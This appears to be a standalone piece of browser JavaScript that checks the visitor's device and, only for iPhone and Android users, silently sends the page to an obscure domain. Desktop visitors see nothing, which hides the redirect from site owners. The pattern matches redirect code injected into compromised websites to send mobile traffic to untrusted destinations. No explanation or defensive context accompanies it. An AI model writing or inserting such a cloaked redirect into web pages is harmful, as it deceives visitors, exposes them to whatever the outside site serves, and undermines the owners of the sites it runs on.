(function() {
  var ua = window.navigator.userAgent.toLowerCase();
  if (!(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent))) {
    return
  } else if (ua.indexOf("iphone") > 0 || ua.indexOf("android") > 0) {
    location.href = "https://wap.byqgwcgzs.cn"
  }
}());
